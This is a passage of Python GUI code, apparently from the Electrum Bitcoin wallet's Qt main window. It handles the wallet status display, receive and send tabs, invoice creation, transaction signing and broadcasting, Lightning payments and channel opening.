Decimal(rate) * COIN)) btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) btc_e.follows = False if fee_e: window.update_fee() else: fiat_e.follows = True fiat_e.setText(self.fx.ccy_amount_str( amount * Decimal(rate) / COIN, False)) fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) fiat_e.follows = False btc_e.follows = False fiat_e.follows = False fiat_e.textChanged.connect(partial(edit_changed, fiat_e)) btc_e.textChanged.connect(partial(edit_changed, btc_e)) fiat_e.is_last_edited = False def update_status(self): if not self.wallet: return if self.network is None: text = _("Offline") icon = read_QIcon("status_disconnected.png") elif self.network.is_connected(): server_height = self.network.get_server_height() server_lag = self.network.get_local_height() - server_height fork_str = "_fork" if len(self.network.get_blockchains())>1 else "" # Server height can be 0 after switching to a new server # until we get a headers subscription request response. # Display the synchronizing message in that case. if not self.wallet.up_to_date or server_height == 0: num_sent, num_answered = self.wallet.get_history_sync_state_details() text = ("{} ({}/{})" .format(_("Synchronizing..."), num_answered, num_sent)) icon = read_QIcon("status_waiting.png") elif server_lag > 1: text = _("Server is lagging ({} blocks)").format(server_lag) icon = read_QIcon("status_lagging%s.png"%fork_str) else: c, u, x = self.wallet.get_balance() text = _("Balance") + ": %s "%(self.format_amount_and_units(c)) if u: text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip()) if x: text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip()) if self.wallet.has_lightning(): l = self.wallet.lnworker.get_balance() text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip()) # append fiat balance and price if self.fx.is_enabled(): text += self.fx.get_fiat_status_text(c + u + x, self.base_unit(), self.get_decimal_point()) or '' if not self.network.proxy: icon = read_QIcon("status_connected%s.png"%fork_str) else: icon = read_QIcon("status_connected_proxy%s.png"%fork_str) else: if self.network.proxy: text = "{} ({})".format(_("Not connected"), _("proxy enabled")) else: text = _("Not connected") icon = read_QIcon("status_disconnected.png") self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename())) self.balance_label.setText(text) if self.status_button: self.status_button.setIcon(icon) def update_wallet(self): self.update_status() if self.wallet.up_to_date or not self.network or not self.network.is_connected(): self.update_tabs() def update_tabs(self, wallet=None): if wallet is None: wallet = self.wallet if wallet != self.wallet: return self.history_model.refresh('update_tabs') self.request_list.update() self.address_list.update() self.utxo_list.update() self.contact_list.update() self.invoice_list.update() self.channels_list.update_rows.emit(wallet) self.update_completions() def create_channels_tab(self): self.channels_list = ChannelsList(self) t = self.channels_list.get_toolbar() return self.create_list_tab(self.channels_list, t) def create_history_tab(self): self.history_model = HistoryModel(self) self.history_list = l = HistoryList(self, self.history_model) self.history_model.set_view(self.history_list) l.searchable_list = l toolbar = l.create_toolbar(self.config) toolbar_shown = bool(self.config.get('show_toolbar_history', False)) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def show_address(self, addr): from . import address_dialog d = address_dialog.AddressDialog(self, addr) d.exec_() def show_channel(self, channel_id): from . import channel_details channel_details.ChannelDetailsDialog(self, channel_id).show() def show_transaction(self, tx, *, tx_desc=None): '''tx_desc is set only for txs created in the Send tab''' show_transaction(tx, parent=self, desc=tx_desc) def show_lightning_transaction(self, tx_item): from .lightning_tx_dialog import LightningTxDialog d = LightningTxDialog(self, tx_item) d.show() def create_receive_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.receive_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) self.receive_message_e = QLineEdit() grid.addWidget(QLabel(_('Description')), 0, 0) grid.addWidget(self.receive_message_e, 0, 1, 1, 4) self.receive_message_e.textChanged.connect(self.update_receive_qr) self.receive_amount_e = BTCAmountEdit(self.get_decimal_point) grid.addWidget(QLabel(_('Requested amount')), 1, 0) grid.addWidget(self.receive_amount_e, 1, 1) self.receive_amount_e.textChanged.connect(self.update_receive_qr) self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_receive_e.setVisible(False) grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft) self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None) self.connect_fields(self, self.amount_e, self.fiat_send_e, None) self.expires_combo = QComboBox() evl = sorted(pr_expiration_values.items()) evl_keys = [i[0] for i in evl] evl_values = [i[1] for i in evl] default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING) try: i = evl_keys.index(default_expiry) except ValueError: i = 0 self.expires_combo.addItems(evl_values) self.expires_combo.setCurrentIndex(i) self.expires_combo.setFixedWidth(self.receive_amount_e.width()) def on_expiry(i): self.config.set_key('request_expiry', evl_keys[i]) self.expires_combo.currentIndexChanged.connect(on_expiry) msg = ''.join([ _('Expiration date of your request.'), ' ', _('This information is seen by the recipient if you send them a signed payment request.'), '\n\n', _('For on-chain requests, the address gets reserved until expiration. After that, it might get reused.'), ' ', _('The bitcoin address never expires and will always be part of this electrum wallet.'), ' ', _('You can reuse a bitcoin address any number of times but it is not good for your privacy.'), '\n\n', _('For Lightning requests, payments will not be accepted after the expiration.'), ]) grid.addWidget(HelpLabel(_('Expires after') + ' (?)', msg), 2, 0) grid.addWidget(self.expires_combo, 2, 1) self.expires_label = QLineEdit('') self.expires_label.setReadOnly(1) self.expires_label.setFocusPolicy(Qt.NoFocus) self.expires_label.hide() grid.addWidget(self.expires_label, 2, 1) self.clear_invoice_button = QPushButton(_('Clear')) self.clear_invoice_button.clicked.connect(self.clear_receive_tab) self.create_invoice_button = QPushButton(_('New Address')) self.create_invoice_button.setIcon(read_QIcon("bitcoin.png")) self.create_invoice_button.setToolTip('Create on-chain request') self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False)) self.receive_buttons = buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_invoice_button) buttons.addWidget(self.create_invoice_button) if self.wallet.has_lightning(): self.create_invoice_button.setText(_('New Address')) self.create_lightning_invoice_button = QPushButton(_('Lightning')) self.create_lightning_invoice_button.setToolTip('Create lightning request') self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png")) self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True)) buttons.addWidget(self.create_lightning_invoice_button) grid.addLayout(buttons, 4, 3, 1, 2) self.receive_payreq_e = ButtonsTextEdit() self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT)) self.receive_payreq_e.addCopyButton(self.app) self.receive_payreq_e.setReadOnly(True) self.receive_payreq_e.textChanged.connect(self.update_receive_qr) self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus) self.receive_qr = QRCodeWidget(fixedSize=220) self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window() self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor)) self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor)) self.receive_address_e = ButtonsTextEdit() self.receive_address_e.setFont(QFont(MONOSPACE_FONT)) self.receive_address_e.addCopyButton(self.app) self.receive_address_e.setReadOnly(True) self.receive_address_e.textChanged.connect(self.update_receive_address_styling) qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self) qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png" self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code")) self.receive_requests_label = QLabel(_('Receive queue')) from .request_list import RequestList self.request_list = RequestList(self) receive_tabs = QTabWidget() receive_tabs.addTab(self.receive_address_e, _('Address')) receive_tabs.addTab(self.receive_payreq_e, _('Request')) receive_tabs.addTab(self.receive_qr, _('QR Code')) receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0)) receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i)) receive_tabs_sp = receive_tabs.sizePolicy() receive_tabs_sp.setRetainSizeWhenHidden(True) receive_tabs.setSizePolicy(receive_tabs_sp) def maybe_hide_receive_tabs(): receive_tabs.setVisible(bool(self.receive_payreq_e.text())) self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs) maybe_hide_receive_tabs() # layout vbox_g = QVBoxLayout() vbox_g.addLayout(grid) vbox_g.addStretch() hbox = QHBoxLayout() hbox.addLayout(vbox_g) hbox.addStretch() hbox.addWidget(receive_tabs) w = QWidget() w.searchable_list = self.request_list vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.receive_requests_label) vbox.addWidget(self.request_list) vbox.setStretchFactor(self.request_list, 1000) return w def delete_requests(self, keys): for key in keys: self.wallet.delete_request(key) self.request_list.update() self.clear_receive_tab() def delete_lightning_payreq(self, payreq_key): self.wallet.lnworker.delete_invoice(payreq_key) self.request_list.update() self.invoice_list.update() self.clear_receive_tab() def sign_payment_request(self, addr): alias = self.config.get('alias') if alias and self.alias_info: alias_addr, alias_name, validated = self.alias_info if alias_addr: if self.wallet.is_mine(alias_addr): msg = _('This payment request will be signed.') + '\n' + _('Please enter your password') password = None if self.wallet.has_keystore_encryption(): password = self.password_dialog(msg) if not password: return try: self.wallet.sign_payment_request(addr, alias, alias_addr, password) except Exception as e: self.show_error(repr(e)) return else: return def create_invoice(self, is_lightning): amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING) if is_lightning: if not self.wallet.lnworker.channels: self.show_error(_("You need to open a Lightning channel first.")) return # TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy) key = self.wallet.lnworker.add_request(amount, message, expiry) else: key = self.create_bitcoin_request(amount, message, expiry) if not key: return self.address_list.update() assert key is not None self.request_list.update() self.request_list.select_key(key) # clear request fields self.receive_amount_e.setText('') self.receive_message_e.setText('') # copy to clipboard r = self.wallet.get_request(key) content = r.invoice if r.is_lightning() else r.get_address() title = _('Invoice') if is_lightning else _('Address') self.do_copy(content, title=title) def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]: addr = self.wallet.get_unused_address() if addr is None: if not self.wallet.is_deterministic(): # imported wallet msg = [ _('No more addresses in your wallet.'), ' ', _('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ', _('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n', _('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'), ] if not self.question(''.join(msg)): return addr = self.wallet.get_receiving_address() else: # deterministic wallet if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")): return addr = self.wallet.create_new_address(False) req = self.wallet.make_payment_request(addr, amount, message, expiration) try: self.wallet.add_payment_request(req) except Exception as e: self.logger.exception('Error adding payment request') self.show_error(_('Error adding payment request') + ':\n' + repr(e)) else: self.sign_payment_request(addr) return addr def do_copy(self, content: str, *, title: str = None) -> None: self.app.clipboard().setText(content) if title is None: tooltip_text = _("Text copied to clipboard").format(title) else: tooltip_text = _("{} copied to clipboard").format(title) QToolTip.showText(QCursor.pos(), tooltip_text, self) def clear_receive_tab(self): self.receive_payreq_e.setText('') self.receive_address_e.setText('') self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) self.expires_label.hide() self.expires_combo.show() self.request_list.clearSelection() def toggle_qr_window(self): from . import qrwindow if not self.qr_window: self.qr_window = qrwindow.QR_Window(self) self.qr_window.setVisible(True) self.qr_window_geometry = self.qr_window.geometry() else: if not self.qr_window.isVisible(): self.qr_window.setVisible(True) self.qr_window.setGeometry(self.qr_window_geometry) else: self.qr_window_geometry = self.qr_window.geometry() self.qr_window.setVisible(False) self.update_receive_qr() def show_send_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab)) def show_receive_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab)) def update_receive_qr(self): uri = str(self.receive_payreq_e.text()) if maybe_extract_bolt11_invoice(uri): # encode lightning invoices as uppercase so QR encoding can use # alphanumeric mode; resulting in smaller QR codes uri = uri.upper() self.receive_qr.setData(uri) if self.qr_window and self.qr_window.isVisible(): self.qr_window.qrw.setData(uri) def update_receive_address_styling(self): addr = str(self.receive_address_e.text()) if is_address(addr) and self.wallet.is_used(addr): self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) self.receive_address_e.setToolTip(_("This address has already been used. " "For better privacy, do not reuse it for new payments.")) else: self.receive_address_e.setStyleSheet("") self.receive_address_e.setToolTip("") def create_send_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.send_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) from .paytoedit import PayToEdit self.amount_e = BTCAmountEdit(self.get_decimal_point) self.payto_e = PayToEdit(self) self.payto_e.addPasteButton(self.app) msg = _('Recipient of the funds.') + '\n\n'\ + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)') payto_label = HelpLabel(_('Pay to'), msg) grid.addWidget(payto_label, 1, 0) grid.addWidget(self.payto_e, 1, 1, 1, -1) completer = QCompleter() completer.setCaseSensitivity(False) self.payto_e.set_completer(completer) completer.setModel(self.completions) msg = _('Description of the transaction (not mandatory).') + '\n\n'\ + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.') description_label = HelpLabel(_('Description'), msg) grid.addWidget(description_label, 2, 0) self.message_e = FreezableLineEdit() self.message_e.setMinimumWidth(700) grid.addWidget(self.message_e, 2, 1, 1, -1) msg = _('Amount to be sent.') + '\n\n' \ + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \ + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \ + _('Keyboard shortcut: type "!" to send all your coins.') amount_label = HelpLabel(_('Amount'), msg) grid.addWidget(amount_label, 3, 0) grid.addWidget(self.amount_e, 3, 1) self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_send_e.setVisible(False) grid.addWidget(self.fiat_send_e, 3, 2) self.amount_e.frozen.connect( lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly())) self.max_button = EnterButton(_("Max"), self.spend_max) self.max_button.setFixedWidth(100) self.max_button.setCheckable(True) grid.addWidget(self.max_button, 3, 3) self.save_button = EnterButton(_("Save"), self.do_save_invoice) self.send_button = EnterButton(_("Pay") + "...", self.do_pay) self.clear_button = EnterButton(_("Clear"), self.do_clear) buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_button) buttons.addWidget(self.save_button) buttons.addWidget(self.send_button) grid.addLayout(buttons, 6, 1, 1, 4) self.amount_e.shortcut.connect(self.spend_max) def reset_max(text): self.max_button.setChecked(False) enable = not bool(text) and not self.amount_e.isReadOnly() #self.max_button.setEnabled(enable) self.amount_e.textEdited.connect(reset_max) self.fiat_send_e.textEdited.connect(reset_max) self.set_onchain(False) self.invoices_label = QLabel(_('Send queue')) from .invoice_list import InvoiceList self.invoice_list = InvoiceList(self) vbox0 = QVBoxLayout() vbox0.addLayout(grid) hbox = QHBoxLayout() hbox.addLayout(vbox0) hbox.addStretch(1) w = QWidget() vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.invoices_label) vbox.addWidget(self.invoice_list) vbox.setStretchFactor(self.invoice_list, 1000) w.searchable_list = self.invoice_list run_hook('create_send_tab', grid) return w def spend_max(self): if run_hook('abort_send', self): return outputs = self.payto_e.get_outputs(True) if not outputs: return make_tx = lambda fee_est: self.wallet.make_unsigned_transaction( coins=self.get_coins(), outputs=outputs, fee=fee_est, is_sweep=False) try: try: tx = make_tx(None) except (NotEnoughFunds, NoDynamicFeeEstimates) as e: # Check if we had enough funds excluding fees, # if so, still provide opportunity to set lower fees. tx = make_tx(0) except MultipleSpendMaxTxOutputs as e: self.max_button.setChecked(False) self.show_error(str(e)) return except NotEnoughFunds as e: self.max_button.setChecked(False) text = self.get_text_not_enough_funds_mentioning_frozen() self.show_error(text) return self.max_button.setChecked(True) amount = tx.output_value() __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0) amount_after_all_fees = amount - x_fee_amount self.amount_e.setAmount(amount_after_all_fees) def get_contact_payto(self, key): _type, label = self.contacts.get(key) return label + ' <' + key + '>' if _type == 'address' else key def update_completions(self): l = [self.get_contact_payto(key) for key in self.contacts.keys()] self.completions.setStringList(l) @protected def protect(self, func, args, password): return func(*args, password) def read_outputs(self) -> List[PartialTxOutput]: if self.payment_request: outputs = self.payment_request.get_outputs() else: outputs = self.payto_e.get_outputs(self.max_button.isChecked()) return outputs def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool: """Returns whether there are errors with outputs. Also shows error dialog to user if so. """ if not outputs: self.show_error(_('No outputs')) return True for o in outputs: if o.scriptpubkey is None: self.show_error(_('Bitcoin Address is None')) return True if o.value is None: self.show_error(_('Invalid Amount')) return True return False # no errors def check_send_tab_payto_line_and_show_errors(self) -> bool: """Returns whether there are errors. Also shows error dialog to user if so. """ pr = self.payment_request if pr: if pr.has_expired(): self.show_error(_('Payment request has expired')) return True if not pr: errors = self.payto_e.get_errors() if errors: if len(errors) == 1 and not errors[0].is_multiline: err = errors[0] self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" + f"{err.line_content[:40]}...\n\n" f"{err.exc!r}") else: self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})" for err in errors])) return True if self.payto_e.is_alias and self.payto_e.validated is False: alias = self.payto_e.toPlainText() msg = _('WARNING: the alias "{}" could not be validated via an additional ' 'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n' msg += _('Do you wish to continue?') if not self.question(msg): return True return False # no errors def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]): if amount_msat is None: raise Exception("missing amount for LN invoice") amount_sat = Decimal(amount_msat) / 1000 # FIXME this is currently lying to user as we truncate to satoshis msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat)) if not self.question(msg): return self.save_pending_invoice() def task(): coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) return fut.result() self.wallet.thread.add(task) def on_request_status(self, wallet, key, status): if wallet != self.wallet: return req = self.wallet.receive_requests.get(key) if req is None: return if status == PR_PAID: self.notify(_('Payment received') + '\n' + key) self.need_update.set() else: self.request_list.update_item(key, req) def on_invoice_status(self, wallet, key): if wallet != self.wallet: return invoice = self.wallet.get_invoice(key) if invoice is None: return status = self.wallet.get_invoice_status(invoice) if status == PR_PAID: self.invoice_list.update() else: self.invoice_list.update_item(key, invoice) def on_payment_succeeded(self, wallet, key): description = self.wallet.get_label(key) self.notify(_('Payment succeeded') + '\n\n' + description) self.need_update.set() def on_payment_failed(self, wallet, key, reason): self.show_error(_('Payment failed') + '\n\n' + reason) def read_invoice(self): if self.check_send_tab_payto_line_and_show_errors(): return if not self._is_onchain: invoice_str = self.payto_e.lightning_invoice if not invoice_str: return if not self.wallet.has_lightning(): self.show_error(_('Lightning is disabled')) return invoice = LNInvoice.from_bech32(invoice_str) if invoice.get_amount_msat() is None: amount_sat = self.amount_e.get_amount() if amount_sat: invoice.amount_msat = int(amount_sat * 1000) else: self.show_error(_('No amount')) return return invoice else: outputs = self.read_outputs() if self.check_send_tab_onchain_outputs_and_show_errors(outputs): return message = self.message_e.text() return self.wallet.create_invoice( outputs=outputs, message=message, pr=self.payment_request, URI=self.payto_URI) def do_save_invoice(self): self.pending_invoice = self.read_invoice() if not self.pending_invoice: return self.save_pending_invoice() def save_pending_invoice(self): if not self.pending_invoice: return self.do_clear() self.wallet.save_invoice(self.pending_invoice) self.invoice_list.update() self.pending_invoice = None def do_pay(self): self.pending_invoice = self.read_invoice() if not self.pending_invoice: return self.do_pay_invoice(self.pending_invoice) def pay_multiple_invoices(self, invoices): outputs = [] for invoice in invoices: outputs += invoice.outputs self.pay_onchain_dialog(self.get_coins(), outputs) def do_pay_invoice(self, invoice: 'Invoice'): if invoice.type == PR_TYPE_LN: assert isinstance(invoice, LNInvoice) self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat()) elif invoice.type == PR_TYPE_ONCHAIN: assert isinstance(invoice, OnchainInvoice) self.pay_onchain_dialog(self.get_coins(), invoice.outputs) else: raise Exception('unknown invoice type') def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]: coins = self.get_manually_selected_coins() if coins is not None: return coins else: return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only) def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]: """Return a list of selected coins or None. Note: None means selection is not being used, while an empty sequence means the user specifically selected that. """ return self.utxo_list.get_spend_list() def get_text_not_enough_funds_mentioning_frozen(self) -> str: text = _("Not enough funds") frozen_bal = sum(self.wallet.get_frozen_balance()) if frozen_bal: text += " ({} {} {})".format( self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen") ) return text def pay_onchain_dialog( self, inputs: Sequence[PartialTxInput], outputs: List[PartialTxOutput], *, external_keypairs=None) -> None: # trustedcoin requires this if run_hook('abort_send', self): return is_sweep = bool(external_keypairs) make_tx = lambda fee_est: self.wallet.make_unsigned_transaction( coins=inputs, outputs=outputs, fee=fee_est, is_sweep=is_sweep) output_values = [x.value for x in outputs] if output_values.count('!') > 1: self.show_error(_("More than one output set to spend max")) return output_value = '!' if '!' in output_values else sum(output_values) conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep) if conf_dlg.not_enough_funds: # Check if we had enough funds excluding fees, # if so, still provide opportunity to set lower fees. if not conf_dlg.have_enough_funds_assuming_zero_fees(): text = self.get_text_not_enough_funds_mentioning_frozen() self.show_message(text) return # shortcut to advanced preview (after "enough funds" check!) if self.config.get('advanced_preview'): preview_dlg = PreviewTxDialog( window=self, make_tx=make_tx, external_keypairs=external_keypairs, output_value=output_value) preview_dlg.show() return cancelled, is_send, password, tx = conf_dlg.run() if cancelled: return if is_send: self.save_pending_invoice() def sign_done(success): if success: self.broadcast_or_show(tx) self.sign_tx_with_password(tx, callback=sign_done, password=password, external_keypairs=external_keypairs) else: preview_dlg = PreviewTxDialog( window=self, make_tx=make_tx, external_keypairs=external_keypairs, output_value=output_value) preview_dlg.show() def broadcast_or_show(self, tx: Transaction): if not tx.is_complete(): self.show_transaction(tx) return if not self.network: self.show_error(_("You can't broadcast a transaction without a live network connection.")) self.show_transaction(tx) return self.broadcast_transaction(tx) @protected def sign_tx(self, tx, *, callback, external_keypairs, password): self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs) def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None): '''Sign the transaction in a separate thread. When done, calls the callback with a success code of True or False. ''' def on_success(result): callback(True) def on_failure(exc_info): self.on_error(exc_info) callback(False) on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success if external_keypairs: # can sign directly task = partial(tx.sign, external_keypairs) else: task = partial(self.wallet.sign_transaction, tx, password) msg = _('Signing transaction...') WaitingDialog(self, msg, task, on_success, on_failure) def broadcast_transaction(self, tx: Transaction): def broadcast_thread(): # non-GUI thread pr = self.payment_request if pr and pr.has_expired(): self.payment_request = None return False, _("Invoice has expired") try: self.network.run_from_another_thread(self.network.broadcast_transaction(tx)) except TxBroadcastError as e: return False, e.get_message_for_gui() except BestEffortRequestFailed as e: return False, repr(e) # success txid = tx.txid() if pr: self.payment_request = None refund_address = self.wallet.get_receiving_address() coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) ack_status, ack_msg = fut.result(timeout=20) self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}") return True, txid # Capture current TL window; override might be removed on return parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin)) def broadcast_done(result): # GUI thread if result: success, msg = result if success: parent.show_message(_('Payment sent.') + '\n' + msg) self.invoice_list.update() else: msg = msg or '' parent.show_error(msg) WaitingDialog(self, _('Broadcasting transaction...'), broadcast_thread, broadcast_done, self.on_error) def mktx_for_open_channel(self, *, funding_sat, node_id): coins = self.get_coins(nonlocal_only=True) make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel( coins=coins, funding_sat=funding_sat, node_id=node_id, fee_est=fee_est) return make_tx def open_channel(self, connect_str, funding_sat, push_amt): try: node_id, rest = extract_nodeid(connect_str) except ConnStringFormatError as e: self.show_error(str(e)) return # use ConfirmTxDialog # we need to know the fee before we broadcast, because the txid is required make_tx = self.mktx_for_open_channel(funding_sat=funding_sat, node_id=node_id) d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False) # disable preview button because the user must not broadcast tx before establishment_flow d.preview_button.setEnabled(False) cancelled, is_send, password, funding_tx = d.run() if not is_send: return if cancelled: return # read funding_sat from tx; converts '!' to int value funding_sat = funding_tx.output_value_for_address(ln_dummy_address()) def task(): return self.wallet.lnworker.open_channel( connect_str=connect_str, funding_tx=funding_tx, funding_sat=funding_sat, push_amt_sat=push_amt, password=password) def on_failure(exc_info): type_, e, traceback = exc_info self.show_error(_('Could not open channel: {}').format(repr(e))) WaitingDialog(self, _('Opening channel...'), task, self.on_open_channel_success, on_failure) def on_open_channel_success(self, args): chan, funding_tx = args lnworker = self.wallet.lnworker if not chan.has_onchain_backup(): backup_dir = self.config.get_backup_dir() if backup_dir is not None: self.show_message(_(f'Your wallet backup has been updated in {backup_dir}')) else: data = lnworker.export_channel_backup(chan.channel_id) help_text = _(messages.MSG_CREATED_NON_RECOVERABLE_CHANNEL) self.show_qrcode( data, _('Save channel backup'), help_text=help_text, show_copy_text_btn=True) n = chan.constraints.funding_txn_minimum_depth message = '\n'.join([ _('Channel established.'), _('Remote peer ID') + ':' + chan.node_id.hex(), _('This channel will be usable after {} confirmations').format(n) ]) if not funding_tx.is_complete(): message += '\n\n' + _('Please sign and broadcast the funding transaction') self.show_message(message) self.show_transaction(funding_tx) else: self.show_message(message) def query_choice(self, msg, choices): # Needed by QtHandler for hardware wallets dialog = WindowModalDialog(self.top_level_window()) clayout = ChoicesLayout(msg, choices) vbox = QVBoxLayout(dialog) vbox.addLayout(clayout.layout()) vbox.addLayout(Buttons(OkButton(dialog))) if not dialog.exec_(): return None return clayout.selected_index() def lock_amount(self, b: bool) -> None: self.amount_e.setFrozen(b) self.max_button.setEnabled(not b) def prepare_for_payment_request(self): self.show_send_tab() self.payto_e.is_pr = True for e in [self.payto_e, self.message_e]: e.setFrozen(True) self.lock_amount(True) self.payto_e.setText(_("please wait...")) return True def delete_invoices(self, keys): for key in keys: self.wallet.delete_invoice(key) self.invoice_list.update() def payment_request_ok(self): pr = self.payment_request if not pr: return key = pr.get_id() invoice = self.wallet.get_invoice(key) if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID: self.show_message("invoice already paid") self.do_clear() self.payment_request = None return self.payto_e.is_pr = True if not pr.has_expired(): self.payto_e.setGreen() else: self.payto_e.setExpired() self.payto_e.setText(pr.get_requestor()) self.amount_e.setAmount(pr.get_amount()) self.message_e.setText(pr.get_memo()) # signal to set fee self.amount_e.textEdited.emit("") def payment_request_error(self): pr = self.payment_request if not pr: return self.show_message(pr.error) self.payment_request = None self.do_clear() def on_pr(self, request: 'paymentrequest.PaymentRequest'): self.set_onchain(True) self.payment_request = request if self.payment_request.verify(self.contacts): self.payment_request_ok_signal.emit() else: self.payment_request_error_signal.emit() def parse_lightning_invoice(self, invoice): """Parse ln invoice, and prepare the send tab for it.""" try: lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP) except Exception as e: raise LnDecodeException(e) from e pubkey = bh2u(lnaddr.pubkey.serialize()) for k,v in lnaddr.tags: if k == 'd': description = v break else: description = '' self.payto_e.setFrozen(True) self.payto_e.setText(pubkey) self.message_e.setText(description) if lnaddr.get_amount_sat() is not None: self.amount_e.setAmount(lnaddr.get_amount_sat()) #self.amount_e.textEdited.emit("") self.set_onchain(False) def set_onchain(self, b): self._is_onchain = b self.max_button.setEnabled(b) def pay_to_URI(self, URI): if not URI: return try: out = util.parse_URI(URI, self.on_pr) except InvalidBitcoinURI as e: self.show_error(_("Error parsing URI") + f":\n{e}") return self.show_send_tab() self.payto_URI = out r = out.get('r') sig = out.get('sig') name = out.get('name') if r or (name and sig): self.prepare_for_payment_request() return address = out.get('address') amount = out.get('amount') label = out.get('label') message = out.get('message') # use label as description (not BIP21 compliant) if label and not message: message = label if address: self.payto_e.setText(address) if message: self.message_e.setText(message) if amount: self.amount_e.setAmount(amount) self.amount_e.textEdited.emit("") def do_clear(self): self.max_button.setChecked(False) self.payment_request = None self.payto_URI = None self.payto_e.is_pr = False self.set_onchain(False) for e in [self.payto_e, self.message_e, self.amount_e]: e.setText('') e.setFrozen(False) self.update_status() run_hook('do_clear', self) def set_frozen_state_of_addresses(self, addrs, freeze: bool): self.wallet.set_frozen_state_of_addresses(addrs, freeze) self.address_list.update() self.utxo_list.update() def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool): utxos_str = {utxo.prevout.to_str() for utxo in utxos} self.wallet.set_frozen_state_of_coins(utxos_str, freeze) self.utxo_list.update() def 